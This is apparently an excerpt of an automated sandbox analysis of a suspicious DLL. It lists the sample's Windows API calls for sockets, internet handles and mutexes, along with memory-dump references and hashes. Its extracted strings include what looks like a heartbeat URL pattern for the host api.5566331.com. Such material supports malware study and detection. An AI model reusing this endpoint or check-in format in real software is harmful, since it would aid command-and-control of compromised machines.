                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoInitialize$combase.dll
                                                      • API String ID: 3489934621-340411864
                                                      • Opcode ID: 71b1fc28e040eaf9fb3e13536ba312b7f61311651f774241ec39d774eafd6ce0
                                                      • Instruction ID: 3814e3cd0c3436562688b886f5d7f2b6b7786d732422ae77aefbb8b6c9afc0e6
                                                      • Opcode Fuzzy Hash: 71b1fc28e040eaf9fb3e13536ba312b7f61311651f774241ec39d774eafd6ce0
                                                      • Instruction Fuzzy Hash: 9DE01A786943646EFB109F70CCCDB893BEAF704706F50A114F105D50A4EBB480489F01
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,10036981), ref: 10036A81
                                                      • GetProcAddress.KERNEL32(00000000), ref: 10036A88
                                                      • EncodePointer.KERNEL32(00000000), ref: 10036A93
                                                      • DecodePointer.KERNEL32(10036981), ref: 10036AAE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: 88d59d67b8e18c4a5f04efac5e6e66de678ae815fc03f88b8b85e5a57a505f36
                                                      • Instruction ID: 257dba45c5b9e5745066ac2a4e5281a1c3e40de3f98b4faded64c9f5e349f13c
                                                      • Opcode Fuzzy Hash: 88d59d67b8e18c4a5f04efac5e6e66de678ae815fc03f88b8b85e5a57a505f36
                                                      • Instruction Fuzzy Hash: 6DE0EC78A95660AFFB11DF60CD8CB453BA5F70834AF11C054F509E50A0EFB88418EF11
                                                      APIs
                                                        • Part of subcall function 100032F8: _memmove.LIBCMT ref: 100033BD
                                                        • Part of subcall function 100032F8: _memmove.LIBCMT ref: 100033F4
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,00000000,00000005,?,?), ref: 1002FA74
                                                      • PostThreadMessageW.USER32(?,00002B5F,?,?), ref: 1002FAC5
                                                      • InternetCloseHandle.WININET(00000000), ref: 1002FADD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove$CloseHandleInternetMessagePostSleepThread
                                                      • String ID: http:$https:
                                                      • API String ID: 1130311992-2714316481
                                                      • Opcode ID: 76b602ee1412f6029f3ee21f7f8d3848bab4ac05bc113f81b98308526ee9b1b9
                                                      • Instruction ID: 915af8a31af0a75dffe03e89711a24d46bdad9159a96e45aa538bd49b24774f9
                                                      • Opcode Fuzzy Hash: 76b602ee1412f6029f3ee21f7f8d3848bab4ac05bc113f81b98308526ee9b1b9
                                                      • Instruction Fuzzy Hash: 5C127E70508381DFE321CF24D884BABBBE1FF89384F54896DE599872A1DB71A845CB53
                                                      APIs
                                                      • HeapAlloc.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 1002427A
                                                      • _memmove.LIBCMT ref: 100242C5
                                                      • WSASend.WS2_32(?,00000018,00000001,?,00000000,00000000,00000000), ref: 100242F6
                                                      • WSAGetLastError.WS2_32 ref: 10024301
                                                      • InterlockedDecrement.KERNEL32(00000028), ref: 10024318
                                                      • HeapFree.KERNEL32(?,00000000,00000000,00000000), ref: 10024340
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocDecrementErrorFreeInterlockedLastSend_memmove
                                                      • String ID:
                                                      • API String ID: 1113664776-0
                                                      • Opcode ID: a462f4ac9f8657c021b9b04c58686a58ea80ed4bfa49ce19956673eda0e90089
                                                      • Instruction ID: 47d4c8ab42c6eea9bfe2ced7c1d785e30afba0d0751f843b89e14ba74dfb26aa
                                                      • Opcode Fuzzy Hash: a462f4ac9f8657c021b9b04c58686a58ea80ed4bfa49ce19956673eda0e90089
                                                      • Instruction Fuzzy Hash: F1418E71A0060AEFDB00CFA5D880A9AB7F9FF48314F41462AE915E7640DB70FE54CB90
                                                      APIs
                                                        • Part of subcall function 100251A0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 100251C5
                                                        • Part of subcall function 100251A0: SwitchToThread.KERNEL32(?,?,?,?,?,1002240E), ref: 100251E9
                                                        • Part of subcall function 100251A0: Sleep.KERNEL32(00000001,?,?,?,?,?,1002240E), ref: 100251FB
                                                      • SetLastError.KERNEL32(000010DD), ref: 100222CC
                                                        • Part of subcall function 10022490: socket.WS2_32(?,00000001,00000006), ref: 100224D7
                                                        • Part of subcall function 10022490: ioctlsocket.WS2_32(?,8004667E,?), ref: 10022520
                                                        • Part of subcall function 10022490: bind.WS2_32(?,00000002,0000001C), ref: 10022540
                                                        • Part of subcall function 10022490: SetLastError.KERNEL32(00000000), ref: 10022551
                                                        • Part of subcall function 10022490: listen.WS2_32(?,?), ref: 1002256F
                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?), ref: 10022255
                                                      • GetLastError.KERNEL32 ref: 10022262
                                                      • SetLastError.KERNEL32(00000000), ref: 1002226C
                                                      • GetLastError.KERNEL32(?,?), ref: 100222AD
                                                      • SetLastError.KERNEL32(00000000), ref: 100222B8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$CompareCompletionCreateExchangeInterlockedPortSleepSwitchThreadbindioctlsocketlistensocket
                                                      • String ID:
                                                      • API String ID: 3008254831-0
                                                      • Opcode ID: 33d1e1a823e7593172266413c69a16bb33dc59e5c5bd4c6ecac0f9ba098da95f
                                                      • Instruction ID: 25731126ecceef237b5eadcf649c6642afb87f46824a2e3290a2af4592c0b696
                                                      • Opcode Fuzzy Hash: 33d1e1a823e7593172266413c69a16bb33dc59e5c5bd4c6ecac0f9ba098da95f
                                                      • Instruction Fuzzy Hash: DC31AD31604646FFE700DFA5D848BAABBE9FF84750F50422AE811C77C0DB76A814CB90
                                                      APIs
                                                        • Part of subcall function 10026BA0: GetCurrentThreadId.KERNEL32 ref: 10026BA4
                                                      • CloseHandle.KERNEL32(?,93656AD3), ref: 1001F34F
                                                      • CloseHandle.KERNEL32(?,93656AD3), ref: 1001F35C
                                                      • DeleteCriticalSection.KERNEL32(?,93656AD3), ref: 1001F374
                                                      • _free.LIBCMT ref: 1001F393
                                                      • HeapDestroy.KERNEL32(?), ref: 1001F3C1
                                                      • _free.LIBCMT ref: 1001F3F0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle_free$CriticalCurrentDeleteDestroyHeapSectionThread
                                                      • String ID:
                                                      • API String ID: 4172272558-0
                                                      • Opcode ID: 74966feeee5e55662b9fe9985a96bced8da136f5a641b9baab4b2a3d6fddc39d
                                                      • Instruction ID: 109e83372a2a65c369b5238d9d2ce49368707bcd3d3f496a78113b41b42a28fc
                                                      • Opcode Fuzzy Hash: 74966feeee5e55662b9fe9985a96bced8da136f5a641b9baab4b2a3d6fddc39d
                                                      • Instruction Fuzzy Hash: E0318BB0600745DBDB10CF69C844B9BFBE8FF54304F00461DE4559B690DBB5E948CB90
                                                      APIs
                                                      • htons.WS2_32(?), ref: 100255F3
                                                      • WSAAddressToStringA.WS2_32(?,0000001C,00000000,?,?), ref: 1002561C
                                                      • htons.WS2_32(?), ref: 10025639
                                                      • StrPBrkA.SHLWAPI(?,1005DEF0), ref: 1002565F
                                                      • StrChrA.SHLWAPI(?,00000025), ref: 1002566A
                                                      • _memmove.LIBCMT ref: 1002568C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: htons$AddressString_memmove
                                                      • String ID:
                                                      • API String ID: 2092185379-0
                                                      • Opcode ID: 5f4a50b4020e0c7fce60411f9dbe05132d6bab3187074c607b9b3e4039f63731
                                                      • Instruction ID: af4dca52562ec587c4ef2840e7a2834d8e0731805111b03a2ffe6cd1c8dc9911
                                                      • Opcode Fuzzy Hash: 5f4a50b4020e0c7fce60411f9dbe05132d6bab3187074c607b9b3e4039f63731
                                                      • Instruction Fuzzy Hash: 2D21D736200356ABEB015FA4EC8CBA677ECEF48356F814026FD05C7150D7B68D81C768
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10015454
                                                      • __time64.LIBCMT ref: 1001547B
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 10015488
                                                      • _rand.LIBCMT ref: 100154A7
                                                      • _rand.LIBCMT ref: 100154BC
                                                      • _rand.LIBCMT ref: 100154C9
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _rand$Time$FileH_prologSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 719677733-0
                                                      • Opcode ID: f7a5117bf611885dd31e75710868ee461aec261d2f3beb21815ee12701733f13
                                                      • Instruction ID: a88c9a8f57be324bb81784dc804cb620c9220be911630338d4b2a3c06f03dd55
                                                      • Opcode Fuzzy Hash: f7a5117bf611885dd31e75710868ee461aec261d2f3beb21815ee12701733f13
                                                      • Instruction Fuzzy Hash: 00114C7ED10520ABC311DBA48C41BDEB3A5EF85666F65451BF825EF141CA79BCC052A0
                                                      APIs
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,10005AD4), ref: 10005B36
                                                      • CloseHandle.KERNEL32(?,?,?,?,10005AD4), ref: 10005B3E
                                                      • ReleaseMutex.KERNEL32(000001FC,?,?,?,10005AD4), ref: 10005B4A
                                                      • CloseHandle.KERNEL32(?,?,?,10005AD4), ref: 10005B52
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,10005AD4), ref: 10005B5F
                                                      • CloseHandle.KERNEL32(?,?,?,?,10005AD4), ref: 10005B67
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleMutexRelease
                                                      • String ID:
                                                      • API String ID: 4207627910-0
                                                      • Opcode ID: b1cee3fd7a79e4365a8f61567f12352077ee08b91f758be315278f7aa15c15ab
                                                      • Instruction ID: c508b5dba44b556361941f415c8e605832dbccd52cfd8276065288f46ee70f95
                                                      • Opcode Fuzzy Hash: b1cee3fd7a79e4365a8f61567f12352077ee08b91f758be315278f7aa15c15ab
                                                      • Instruction Fuzzy Hash: 1611FE34101B009BE728EB75CC99EEBB7E9FF44340B41481DE09A87166DB75BA85CB14
                                                      APIs
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      • _free.LIBCMT ref: 1002A9DA
                                                        • Part of subcall function 10033888: std::exception::exception.LIBCMT ref: 100338BC
                                                        • Part of subcall function 10033888: __CxxThrowException@8.LIBCMT ref: 100338D1
                                                      • _free.LIBCMT ref: 1002AA3D
                                                      • _free.LIBCMT ref: 1002AA53
                                                      • _free.LIBCMT ref: 1002AA76
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Exception@8Throw_mallocstd::exception::exception
                                                      • String ID: mid
                                                      • API String ID: 2919663970-1101984974
                                                      • Opcode ID: 12b17f1f47d9965d1c629af448463cbbb5fa1ce101f2ba63457331677a5339a4
                                                      • Instruction ID: adf4b229ca35f980d8bca538a1a01f750506ab05ceced394b0d2457890389393
                                                      • Opcode Fuzzy Hash: 12b17f1f47d9965d1c629af448463cbbb5fa1ce101f2ba63457331677a5339a4
                                                      • Instruction Fuzzy Hash: 16D136B1D103599EDB21CFA4CC417DEBBB1EF4A300F5042AAE449AB241EB755A89CF91
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 10041828
                                                        • Part of subcall function 1003C94F: EncodePointer.KERNEL32(00000000,?,1004182D,100365DC,1005F5F8,00000008), ref: 1003C952
                                                        • Part of subcall function 1003C94F: __initp_misc_winsig.LIBCMT ref: 1003C973
                                                      • __mtinitlocks.LIBCMT ref: 1004182D
                                                        • Part of subcall function 10037A95: InitializeCriticalSectionAndSpinCount.KERNEL32(10065570,00000FA0,?,?,10041832,100365DC,1005F5F8,00000008), ref: 10037AB3
                                                      • __mtterm.LIBCMT ref: 10041836
                                                      • __calloc_crt.LIBCMT ref: 1004185B
                                                      • GetCurrentThreadId.KERNEL32 ref: 10041884
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm
                                                      • String ID:
                                                      • API String ID: 1171689812-0
                                                      • Opcode ID: 16d5ded0de0c11e0ceb996ffb4cfa71e2bcd6a509d528ea8bcd8d02f3c03175c
                                                      • Instruction ID: 750453ac2fefb3abb05fc6b638d2b9d0fcd8966267f4e72a87cc493a9f650df8
                                                      • Opcode Fuzzy Hash: 16d5ded0de0c11e0ceb996ffb4cfa71e2bcd6a509d528ea8bcd8d02f3c03175c
                                                      • Instruction Fuzzy Hash: 01F0CDB67297226DE225E7792C077EB2AC0DF01272F32063EF464D90D2FF11A8018158
                                                      APIs
                                                      • CreateMutexA.KERNEL32(00000000,00000000,1000EF35,000001C8), ref: 100151AF
                                                      • GetLastError.KERNEL32 ref: 100151BB
                                                      • ReleaseMutex.KERNEL32(00000000), ref: 100151C9
                                                      • CloseHandle.KERNEL32(00000000), ref: 100151D0
                                                      • ReleaseMutex.KERNEL32(00000000), ref: 100151DA
                                                      • CloseHandle.KERNEL32(00000000), ref: 100151E1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                      • String ID:
                                                      • API String ID: 299056699-0
                                                      • Opcode ID: f16090332a443110e37fb4a15934dc5cf799fb4b965f6a5998d9995d691f2e92
                                                      • Instruction ID: 800ce60f158ef0ea3815663d752b036469cae43976e0dcf2657369177bbbfcb0
                                                      • Opcode Fuzzy Hash: f16090332a443110e37fb4a15934dc5cf799fb4b965f6a5998d9995d691f2e92
                                                      • Instruction Fuzzy Hash: 06F0FE76401A29FFE7029FB5DC999DE3BACEB15242B048012F9068A111C731DA85CFA5
                                                      APIs
                                                      • Sleep.KERNEL32(000001F4,?,?,?), ref: 1002F457
                                                      • PostThreadMessageW.USER32(?,00002B5F,?,?), ref: 1002F496
                                                      • InternetCloseHandle.WININET(00000010), ref: 1002F4A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleInternetMessagePostSleepThread
                                                      • String ID: http:$https:
                                                      • API String ID: 3505073871-2714316481
                                                      • Opcode ID: fd533cb330b2eb47bcd2d1a7aba7961fd34ca8c5aba792ca752c94813477cb6a
                                                      • Instruction ID: 08bc87893911aea4971000add18b57d5099268f2de168e91a491ab19bf3e696c
                                                      • Opcode Fuzzy Hash: fd533cb330b2eb47bcd2d1a7aba7961fd34ca8c5aba792ca752c94813477cb6a
                                                      • Instruction Fuzzy Hash: D1B1AE705083808FE711DF68E884B2BBBE6EF85394F84493DF496872A1D7B1D949CB52
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100114DC
                                                      • __time64.LIBCMT ref: 100114FD
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                        • Part of subcall function 10012234: __EH_prolog.LIBCMT ref: 10012239
                                                        • Part of subcall function 10012234: _free.LIBCMT ref: 100122FF
                                                        • Part of subcall function 10012234: _free.LIBCMT ref: 10012311
                                                        • Part of subcall function 1001BE7E: __EH_prolog.LIBCMT ref: 1001BE83
                                                        • Part of subcall function 1001BE7E: _sprintf.LIBCMT ref: 1001BEF8
                                                        • Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950
                                                        • Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704
                                                        • Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E
                                                      • _sprintf.LIBCMT ref: 100116C9
                                                        • Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473
                                                      Strings
                                                      • /index.php/inface/Heart/index?data=%s&member_id=%s&time=%d, xrefs: 100116C3
                                                      • api.5566331.com, xrefs: 100116F0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
